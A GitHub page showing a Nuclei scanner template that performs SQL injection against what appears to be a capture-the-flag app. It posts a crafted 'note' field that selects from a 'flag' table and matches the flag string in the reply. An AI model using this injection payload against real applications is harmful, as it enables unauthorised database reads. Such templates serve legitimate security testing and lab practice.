-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathflag-extraction.yaml
36 lines (33 loc) · 1.01 KB
/
flag-extraction.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
id: flag-extraction
info:
name: Flag Extraction via SQL Injection
author: your-name
severity: info
description: This template performs a SQL injection to extract the flag from the application.
reference:
- https://your-reference-link
tags: sqli,flag
requests:
- method: POST
path:
- "{{BaseURL}}/"
headers:
User-Agent: "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
Accept: "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8"
Accept-Language: "en-US,en;q=0.5"
Accept-Encoding: "gzip, deflate, br"
Content-Type: "application/x-www-form-urlencoded"
Origin: "{{BaseURL}}"
Connection: "keep-alive"
Cookie: "session={{cookie}}"
Upgrade-Insecure-Requests: "1"
body: "note=AppSec' || (select * from flag)) --"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "FlagY"
- type: status
status:
- 200